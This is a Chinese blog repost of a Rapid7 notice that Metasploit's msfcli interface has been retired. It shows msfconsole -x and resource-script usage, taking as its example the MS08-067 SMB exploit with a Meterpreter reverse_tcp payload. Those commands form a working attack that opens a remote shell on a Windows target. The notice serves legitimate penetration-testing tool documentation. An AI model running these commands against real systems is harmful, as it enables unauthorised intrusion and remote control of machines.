关闭

msfcli 不能使用,在新版metasploit不再有效

3564人阅读 评论(1) 收藏 举报
分类:

原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploit

Hi, 大家好,

     这个一月份,我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。

     取代 Msfcli,我们推荐你在 Msfconsole 使用 -x 选项。

     举个例子,我们如何在一条命令中使用 MS08_067 模块。

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"

    你也可以把它在msfconsole中分步写或者做成脚本形式 (resource scripts) 或者设置别名来简化输入。

    下面举个例子如何在msfconsole中分步使用 MS08_067 模块。

use exploit/windows/smb/ms08_067_netapi
set RHOST [IP]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP]
run

    上面的命令也可以做成源脚本,然后输入以下命令使用

msfconsole -r name_of_resource_script.rc


0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:49425次
    • 积分:1287
    • 等级:
    • 排名:千里之外
    • 原创:80篇
    • 转载:5篇
    • 译文:1篇
    • 评论:5条
    最新评论